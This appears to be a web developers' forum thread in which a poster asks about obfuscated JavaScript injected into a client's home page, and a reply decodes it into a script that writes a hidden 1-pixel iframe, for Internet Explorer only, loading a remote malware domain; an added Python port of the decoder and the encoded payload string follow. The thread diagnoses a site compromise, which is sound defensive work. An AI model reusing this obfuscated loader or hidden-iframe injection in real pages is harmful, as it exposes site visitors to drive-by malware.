Hello,
I'm hoping someone might help us understand the code listed below.
One of our clients has been having unknown JavaScript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.
The following code appears this week on their site:
<script language=JavaScript>
function decrypt_p(x){
  // l: chars left, b: chunk size, p: read position, s: bit shift, w: bit accumulator
  var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
  // substitution table, indexed by (charCode - 48)
  t=Array(63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,
  52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,
  0,0,0,0,3,0,2,30,61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,
  40,38,28,4,43,53);
  for(j=Math.ceil(l/b);j>0;j--){
    r='';
    for(i=Math.min(l,b);i>0;i--,l--){
      // each character contributes 6 bits; every completed byte is XORed with 165
      w|=(t[x.charCodeAt(p++)-48])<<s;
      if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}
    }
    document.write(r)
  }
}
decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")
</script>
Has anyone seen this before? I did a quick search and it mentioned
something about it being an encryption technique.
Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.
Could the hosting company be compromised?
Any information or insight is much appreciated.
Cheers,
Ken
It looks to act upon a big old string of encoded material to produce
something written into the document.
It would help to know in what context this piece of script appeared.
The code was inserted into the body of the page, directly after the
<body> tag.
The page does not appear to have any text, other than what the client
has supplied, appearing on the page after it appears in the browser.
ke*********@gmail.com wrote:
decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>
This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".
The decrypt function decodes this into the following JavaScript program
and inserts it into the web page.
<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer" src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1" height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>
As you can see, the spyware targets only Microsoft Internet Explorer,
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php,
which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007
The web server for this domain is presently down so what the iframe was
actually doing is an open question.
But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.
--------------------------------------------------------------------------- http://www.hunlock.com -- Permanently under construction (And proud of it!)
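The decoding pcx99 walks through above, as an added example that is not code from the thread: a Python port of the posted decrypt_p() table and 6-bit unpacking, so the blob can be decoded offline in an analysis environment rather than run by a browser. The iframe_sources() helper, the whitespace skipping and the error on unknown characters are additions of mine, not part of the original script.

```python
import re

# Substitution table copied from the posted decrypt_p(); index = ord(ch) - 48.
TABLE = [63, 25, 32, 12, 23, 26, 22, 33, 27, 8, 0, 0, 0, 0, 0, 0, 51, 44, 41,
         20, 46, 52, 18, 42, 0, 49, 29, 60, 50, 11, 36, 13, 48, 35, 15, 10, 55,
         34, 56, 37, 57, 21, 39, 0, 0, 0, 0, 3, 0, 2, 30, 61, 14, 31, 1, 62, 19,
         7, 58, 16, 54, 9, 45, 5, 17, 6, 47, 59, 24, 40, 38, 28, 4, 43, 53]

def decrypt_p(encoded: str) -> str:
    """Port of the posted JavaScript decoder: each character maps to a
    6-bit value via TABLE, values are packed little-endian, and every
    completed byte is XORed with 165 (four input chars -> three bytes).
    Whitespace from mail wrapping is skipped; other unknown chars raise.
    """
    out = bytearray()
    w = s = 0                          # bit accumulator and current shift
    for ch in "".join(encoded.split()):
        idx = ord(ch) - 48
        if not 0 <= idx < len(TABLE):
            raise ValueError(f"{ch!r} is outside the decoder alphabet")
        w |= TABLE[idx] << s
        if s:                          # a full byte has been assembled
            out.append(165 ^ (w & 255))
            w >>= 8
            s -= 2
        else:
            s = 6
    return out.decode("latin-1")

def iframe_sources(html: str) -> list:
    """List the src targets of any <iframe> the decoded payload writes."""
    return re.findall(r'''<iframe[^>]*\ssrc=["']([^"']+)''', html, flags=re.I)

# The encoded argument exactly as posted in the thread (mail wrapping removed).
PAYLOAD = (
    "rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic"
    "786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo"
    "LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49"
    "VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f"
    "yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO"
    "I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES"
    "FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A"
    "POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1"
    "GucveRszi0v"
)

if __name__ == "__main__":
    html = decrypt_p(PAYLOAD)
    print(html, "\niframe targets:", iframe_sources(html))
```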
Wow, thank you.
Could I assume that this spyware is on the host's server?
We're developing on the Mac using Text & Dreamweaver. I've done a virus
scan and haven't found anything at all.
Many thanks for the insight.
Cheers,
Ken
More about it here: http://www.aboutus.org/Wsfgfdgrtyhgfd.net
(In reply to "Mr. Ken" <ken.robe...@gmail.com>, Nov 25, 6:42 pm)